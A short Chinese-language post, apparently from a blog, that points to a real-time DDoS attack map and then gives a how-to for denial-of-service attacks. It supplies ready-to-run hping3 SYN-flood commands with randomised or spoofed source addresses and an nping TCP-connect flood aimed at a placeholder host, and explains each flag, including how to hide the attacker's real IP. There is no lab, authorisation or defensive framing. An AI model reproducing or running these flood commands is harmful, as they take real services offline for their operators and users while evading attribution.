DDoS攻擊是常見的攻擊方式,每小時大約發生28次。http://www.digitalattackmap.com提供在世界范圍內的DDoS實時攻擊分布圖:
從DDoS攻擊的地圖上就可以看出國際形勢;例如,到9月18號可以看到日本-中國的攻擊;川普宣布建牆之后,可以看到墨西哥-美國的攻擊。
使用hping3進行DoS攻擊:
# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com
- -c:發送數據包的個數
- -d:每個數據包的大小
- -S:發送SYN數據包
- -w:TCP window大小
- -p:目標端口,你可以指定任意端口
- –flood:盡可能快的發送數據包
- –rand-source:使用隨機的IP地址,目標機器看到一堆ip,不能定位你的實際IP;也可以使用-a或–spoof隱藏主機名
簡單的SYN洪水攻擊:
# hping3 -S --flood -V testsite.com
TCP連接攻擊:
# nping --tcp-connect -rate=90000 -c 900000 -q testsite.com
關於這兩個工具的更多信息:
# man hping3
# man nping